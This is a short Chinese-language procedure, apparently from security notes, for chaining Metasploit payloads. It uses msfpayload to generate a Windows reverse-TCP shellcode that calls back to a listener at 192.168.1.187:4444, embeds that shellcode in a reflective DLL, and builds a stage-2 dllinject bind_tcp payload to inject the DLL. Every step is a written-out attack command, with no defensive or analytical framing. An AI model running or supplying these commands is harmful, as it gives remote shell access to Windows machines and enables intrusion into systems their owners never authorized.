步骤
1.利用msfpayload 生成普通的shellcode,如反弹shellcode
msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.1.187 LPORT=4444 C
2.将生成的shellcode,放入reflective_dll里面,把shellcode替换掉
3.利用msfpayload,生成stage2 shellcode
msfpayload windows/dllinject/bind_tcp DLL=/download/reflective_dll.dll EXITFUNC=seh LPORT=4444 C